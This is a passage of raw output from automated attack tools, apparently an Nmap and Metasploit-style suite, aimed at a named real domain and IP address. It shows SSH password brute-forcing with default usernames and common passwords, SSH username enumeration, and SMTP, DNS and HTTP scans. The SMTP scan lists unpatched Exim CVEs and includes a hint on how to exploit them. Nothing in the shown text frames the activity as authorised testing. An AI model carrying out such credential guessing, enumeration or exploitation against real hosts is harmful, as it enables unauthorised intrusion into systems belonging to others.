NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:princess NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:12345678 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:1234567 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:abc123 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:nicole NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:daniel NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:monkey NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:babygirl NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:qwerty NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:lovely NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:654321 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:michael NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:jessica NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:111111 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:ashley NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:000000 NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:iloveu NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:iloveu NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:iloveu NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:iloveu NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:iloveu NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:iloveu NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:iloveu NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:iloveu NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:iloveu NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:iloveu NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:michelle NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:michelle NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:michelle NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:michelle NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:michelle NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:michelle NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: guest:michelle NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: user:michelle NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: web:michelle NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: test:michelle NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: root:tigger NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: admin:tigger NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: administrator:tigger NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: webadmin:tigger NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: sysadmin:tigger NSE: [ssh-brute 212.86.108.165:22] Trying username/password pair: netadmin:tigger Completed NSE at 00:01, 90.60s elapsed Initiating NSE at 00:01 Completed NSE at 00:01, 0.05s elapsed Nmap scan report for teengirls.top (212.86.108.165) Host is up (0.16s latency). rDNS record for 212.86.108.165: tinytube.top PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) | ssh-auth-methods: | Supported authentication methods: | publickey |_ password | ssh-hostkey: | 2048 89:e2:fc:31:f3:d0:4d:b0:17:85:f9:83:ef:c3:cf:a4 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUFQm0uy2dTmkm24ajIdy8XrH6ywI2JPjLYXzmT4Oy7snGV4OMhWWhSpqVVRZ5ZQPn1O1q7h4M2CJdhC2c2cp4rwHkLRWM7+4WW3aLynC1Nb+wPd391CUuE6gG5RgZyFu0IEFa/ktIo2cyNLMbXS9ZcKmh7vtuDpBFr02Ou6a3Uy4uF8ICjDzZpdtmJe7y/DOspkvg5AvQYsmLj8Sj06o/me/sgHwCvVP7nYpBdGrEAg64t9/kNMNCEfjbo4rL1lMYOpwzJ5dxMAV17hxje4/CICtnLceZJZcEEpc5zLFJue0DGsEGPGS34xJh5Bks89oVDrHz0vVCDP7f4lKhS/JN | 256 a9:72:e2:82:ba:05:fc:44:19:1d:9a:c3:15:c0:89:28 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPOo/GnwYqLI/+z6nfx9VuvtSae7gab/iqBi2kvdgzqS/UOec7sO5Z057GNByM4oTAMe//zECtXjFoOQb/jvczM= | 256 3a:ca:80:35:34:89:6f:e5:f0:40:a3:10:e5:95:be:f7 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFQ6Rql9e7IoIjQcm79Uvc6mJC4y4cb6FsWvvrDhM1BS | ssh-publickey-acceptance: |_ Accepted Public Keys: No public keys accepted |_ssh-run: Failed to specify credentials and command to run. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.16 (94%), Linux 3.18 (94%), Linux 4.2 (94%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.408 days (since Wed Aug 26 14:13:37 2020) Network Distance: 11 hops TCP Sequence Prediction: Difficulty=254 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 52.64 ms 10.203.8.1 2 52.42 ms unn-185-152-66-238.datapacket.com (185.152.66.238) 3 53.82 ms 165.254.21.49 4 55.83 ms ae-3.r23.atlnga05.us.bb.gin.ntt.net (129.250.5.209) 5 ... 6 75.25 ms ae-1.r24.asbnva02.us.bb.gin.ntt.net (129.250.2.37) 7 156.45 ms ae-2.r25.amstnl02.nl.bb.gin.ntt.net (129.250.6.163) 8 156.40 ms ae-1.r04.amstnl02.nl.bb.gin.ntt.net (129.250.3.105) 9 150.26 ms ce-0-4-0-2.r04.amstnl02.nl.ce.gin.ntt.net (128.241.6.7) 10 ... 11 160.48 ms tinytube.top (212.86.108.165) NSE: Script Post-scanning. Initiating NSE at 00:01 Completed NSE at 00:01, 0.00s elapsed Initiating NSE at 00:01 Completed NSE at 00:01, 0.00s elapsed ##################################################################################################################################### USER_FILE => /usr/share/brutex/wordlists/simple-users.txt RHOSTS => teengirls.top RHOST => teengirls.top [*] 212.86.108.165:22 - SSH - Using malformed packet technique [*] 212.86.108.165:22 - SSH - Starting scan [+] 212.86.108.165:22 - SSH - User 'admin' found [+] 212.86.108.165:22 - SSH - User 'administrator' found [+] 212.86.108.165:22 - SSH - User 'anonymous' found [+] 212.86.108.165:22 - SSH - User 'backup' found [+] 212.86.108.165:22 - SSH - User 'bee' found [+] 212.86.108.165:22 - SSH - User 'ftp' found [+] 212.86.108.165:22 - SSH - User 'guest' found [+] 212.86.108.165:22 - SSH - User 'GUEST' found [+] 212.86.108.165:22 - SSH - User 'info' found [+] 212.86.108.165:22 - SSH - User 'mail' found [+] 212.86.108.165:22 - SSH - User 'mailadmin' found [+] 212.86.108.165:22 - SSH - User 'msfadmin' found [+] 212.86.108.165:22 - SSH - User 'mysql' found [+] 212.86.108.165:22 - SSH - User 'nobody' found [+] 212.86.108.165:22 - SSH - User 'oracle' found [+] 212.86.108.165:22 - SSH - User 'owaspbwa' found [+] 212.86.108.165:22 - SSH - User 'postfix' found [+] 212.86.108.165:22 - SSH - User 'postgres' found [+] 212.86.108.165:22 - SSH - User 'private' found [+] 212.86.108.165:22 - SSH - User 'proftpd' found [+] 212.86.108.165:22 - SSH - User 'public' found [+] 212.86.108.165:22 - SSH - User 'root' found [+] 212.86.108.165:22 - SSH - User 'superadmin' found [+] 212.86.108.165:22 - SSH - User 'support' found [+] 212.86.108.165:22 - SSH - User 'sys' found [+] 212.86.108.165:22 - SSH - User 'system' found [+] 212.86.108.165:22 - SSH - User 'systemadmin' found [+] 212.86.108.165:22 - SSH - User 'systemadministrator' found [+] 212.86.108.165:22 - SSH - User 'test' found [+] 212.86.108.165:22 - SSH - User 'tomcat' found [+] 212.86.108.165:22 - SSH - User 'user' found [+] 212.86.108.165:22 - SSH - User 'webmaster' found [+] 212.86.108.165:22 - SSH - User 'www-data' found [+] 212.86.108.165:22 - SSH - User 'Fortimanager_Access' found [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ######################################################################################################################################## Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:02 EDT NSE: Loaded 55 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:02 Completed NSE at 00:02, 0.00s elapsed Initiating NSE at 00:02 Completed NSE at 00:02, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 00:02 Completed Parallel DNS resolution of 1 host. at 00:02, 0.05s elapsed Initiating SYN Stealth Scan at 00:02 Scanning teengirls.top (212.86.108.165) [1 port] Discovered open port 25/tcp on 212.86.108.165 Completed SYN Stealth Scan at 00:02, 0.20s elapsed (1 total ports) Initiating Service scan at 00:02 Scanning 1 service on teengirls.top (212.86.108.165) Completed Service scan at 00:02, 0.41s elapsed (1 service on 1 host) Initiating OS detection (try #1) against teengirls.top (212.86.108.165) Retrying OS detection (try #2) against teengirls.top (212.86.108.165) Initiating Traceroute at 00:02 Completed Traceroute at 00:02, 3.01s elapsed Initiating Parallel DNS resolution of 10 hosts. at 00:02 Completed Parallel DNS resolution of 10 hosts. at 00:02, 0.77s elapsed NSE: Script scanning 212.86.108.165. Initiating NSE at 00:02 NSE Timing: About 71.23% done; ETC: 00:04 (0:00:30 remaining) Completed NSE at 00:04, 91.03s elapsed Initiating NSE at 00:04 Completed NSE at 00:04, 0.00s elapsed Nmap scan report for teengirls.top (212.86.108.165) Host is up (0.16s latency). rDNS record for 212.86.108.165: tinytube.top PORT STATE SERVICE VERSION 25/tcp open smtp Exim smtpd 4.89 | smtp-commands: tinytube.top Hello teengirls.top [185.152.66.234], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN CRAM-MD5, STARTTLS, HELP, |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP | smtp-enum-users: |_ Method RCPT returned a unhandled status code. |_smtp-open-relay: SMTP RSET: failed to receive data: connection closed | smtp-vuln-cve2010-4344: | Exim version: 4.89 | Exim heap overflow vulnerability (CVE-2010-4344): | Exim (CVE-2010-4344): NOT VULNERABLE | Exim privileges escalation vulnerability (CVE-2010-4345): | Exim (CVE-2010-4345): NOT VULNERABLE |_ To confirm and exploit the vulnerabilities, run with --script-args='smtp-vuln-cve2010-4344.exploit' | vulners: | cpe:/a:exim:exim:4.89: | CVE-2019-15846 10.0 https://vulners.com/cve/CVE-2019-15846 | CVE-2019-13917 10.0 https://vulners.com/cve/CVE-2019-13917 | CVE-2019-10149 7.5 https://vulners.com/cve/CVE-2019-10149 | CVE-2018-6789 7.5 https://vulners.com/cve/CVE-2018-6789 | CVE-2017-16943 7.5 https://vulners.com/cve/CVE-2017-16943 | CVE-2020-8015 7.2 https://vulners.com/cve/CVE-2020-8015 | CVE-2017-16944 5.0 https://vulners.com/cve/CVE-2017-16944 |_ CVE-2017-1000369 2.1 https://vulners.com/cve/CVE-2017-1000369 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 3.16 (94%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.417 days (since Wed Aug 26 14:04:02 2020) Network Distance: 11 hops TCP Sequence Prediction: Difficulty=257 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE (using port 25/tcp) HOP RTT ADDRESS 1 54.31 ms 10.203.8.1 2 56.04 ms unn-185-152-66-238.datapacket.com (185.152.66.238) 3 56.76 ms 165.254.21.49 4 61.69 ms ae-3.r23.atlnga05.us.bb.gin.ntt.net (129.250.5.209) 5 70.73 ms ae-4.r25.asbnva02.us.bb.gin.ntt.net (129.250.4.165) 6 70.81 ms ae-1.r24.asbnva02.us.bb.gin.ntt.net (129.250.2.37) 7 155.61 ms ae-2.r25.amstnl02.nl.bb.gin.ntt.net (129.250.6.163) 8 159.51 ms ae-1.r04.amstnl02.nl.bb.gin.ntt.net (129.250.3.105) 9 160.67 ms ce-0-4-0-2.r04.amstnl02.nl.ce.gin.ntt.net (128.241.6.7) 10 ... 11 156.56 ms tinytube.top (212.86.108.165) NSE: Script Post-scanning. Initiating NSE at 00:04 Completed NSE at 00:04, 0.00s elapsed Initiating NSE at 00:04 Completed NSE at 00:04, 0.00s elapsed ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:06 EDT NSE: Loaded 64 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:06 Completed NSE at 00:06, 0.00s elapsed Initiating NSE at 00:06 Completed NSE at 00:06, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 00:06 Completed Parallel DNS resolution of 1 host. at 00:06, 0.07s elapsed Initiating SYN Stealth Scan at 00:06 Scanning teengirls.top (212.86.108.165) [1 port] Discovered open port 53/tcp on 212.86.108.165 Completed SYN Stealth Scan at 00:06, 0.21s elapsed (1 total ports) Initiating Service scan at 00:06 Scanning 1 service on teengirls.top (212.86.108.165) Completed Service scan at 00:06, 6.33s elapsed (1 service on 1 host) Initiating OS detection (try #1) against teengirls.top (212.86.108.165) Retrying OS detection (try #2) against teengirls.top (212.86.108.165) Initiating Traceroute at 00:06 Completed Traceroute at 00:06, 3.01s elapsed Initiating Parallel DNS resolution of 9 hosts. at 00:06 Completed Parallel DNS resolution of 9 hosts. at 00:06, 1.20s elapsed NSE: Script scanning 212.86.108.165. Initiating NSE at 00:06 Completed NSE at 00:06, 13.33s elapsed Initiating NSE at 00:06 Completed NSE at 00:06, 0.00s elapsed Nmap scan report for teengirls.top (212.86.108.165) Host is up (0.16s latency). rDNS record for 212.86.108.165: tinytube.top PORT STATE SERVICE VERSION 53/tcp open domain ISC BIND 9.10.3-P4 (Debian Linux) |_dns-fuzz: Server didn't response to our probe, can't fuzz | dns-nsec-enum: |_ No NSEC records found | dns-nsec3-enum: |_ DNSSEC NSEC3 not supported | dns-nsid: |_ bind.version: 9.10.3-P4-Debian Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.16 - 4.6 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 3.16 (94%), Linux 4.2 (94%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.412 days (since Wed Aug 26 14:13:37 2020) Network Distance: 11 hops TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | dns-brute: | DNS Brute-force hostnames: | mail.teengirls.top - 212.86.108.165 | www.teengirls.top - 212.86.108.165 | ftp.teengirls.top - 212.86.108.165 |_ smtp.teengirls.top - 212.86.108.165 TRACEROUTE (using port 53/tcp) HOP RTT ADDRESS 1 50.33 ms 10.203.8.1 2 51.90 ms unn-185-152-66-238.datapacket.com (185.152.66.238) 3 53.84 ms 165.254.21.49 4 53.80 ms ae-3.r23.atlnga05.us.bb.gin.ntt.net (129.250.5.209) 5 ... 6 68.18 ms ae-1.r24.asbnva02.us.bb.gin.ntt.net (129.250.2.37) 7 156.09 ms ae-2.r25.amstnl02.nl.bb.gin.ntt.net (129.250.6.163) 8 151.69 ms ae-1.r04.amstnl02.nl.bb.gin.ntt.net (129.250.3.105) 9 151.43 ms ce-0-4-0-2.r04.amstnl02.nl.ce.gin.ntt.net (128.241.6.7) 10 ... 11 152.02 ms tinytube.top (212.86.108.165) NSE: Script Post-scanning. Initiating NSE at 00:06 Completed NSE at 00:06, 0.00s elapsed Initiating NSE at 00:06 Completed NSE at 00:06, 0.00s elapsed #################################################################################################################################### HTTP/1.1 200 OK Date: Thu, 27 Aug 2020 04:06:35 GMT Server: Apache/2.4.25 (Debian) Content-Type: text/html; charset=UTF-8 ##################################################################################################################################### content/slider-01/ content/slider-02/ content/slider-03/ content/slider-04/ content/slider-05/ content/slider-06/ content/slider-07/ content/slider-08/ content/slider-09/ content/slider-10/ content/slider-11/ content/slider-12/ content/slider-13/ content/slider-14/ content/slider-16/ content/slider-17/ https://fonts.googleapis.com/css2?family=Merienda+One&display=swap https://hvato.info/core.js?sid=887723 http://trade.tinytube.top/ text/css text/javascript ##################################################################################################################################### Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 00:07 EDT NSE: Loaded 159 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 00:07 Completed NSE at 00:07, 0.00s elapsed Initiating NSE at 00:07 Completed NSE at 00:07, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 00:07 Completed Parallel DNS resolution of 1 host. at 00:07, 0.06s elapsed Initiating SYN Stealth Scan at 00:07 Scanning teengirls.top (212.86.108.165) [1 port] Discovered open port 80/tcp on 212.86.108.165 Completed SYN Stealth Scan at 00:07, 0.21s elapsed (1 total ports) Initiating Service scan at 00:07 Scanning 1 service on teengirls.top (212.86.108.165) Completed Service scan at 00:07, 6.42s elapsed (1 service on 1 host) NSE: Script scanning 212.86.108.165. Initiating NSE at 00:07 Completed NSE at 00:08, 90.43s elapsed Initiating NSE at 00:08 Completed NSE at 00:09, 7.56s elapsed Nmap scan report for teengirls.top (212.86.108.165) Host is up (0.16s latency). rDNS record for 212.86.108.165: tinytube.top PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-brute: |_ Path "/" does not require authentication |_http-chrono: Request times for /; avg: 4757.51ms; min: 3415.29ms; max: 6473.29ms |_http-date: Thu, 27 Aug 2020 04:07:27 GMT; -1s from local time. |_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages. |_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number= for deeper analysis) | http-errors: | Spidering limited to: maxpagecount=40; withinhost=teengirls.top | Found the following error pages: | | Error Code: 404 |_ http://teengirls.top:80/content/slider-17/ |_http-feed: Couldn't find any feeds. |_http-fetch: Please enter the complete path of the directory to save data in. | http-headers: | Date: Thu, 27 Aug 2020 04:07:55 GMT | Server: Apache/2.4.25 (Debian) | Connection: close | Content-Type: text/html; charset=UTF-8 | |_ (Request type: HEAD) | http-methods: 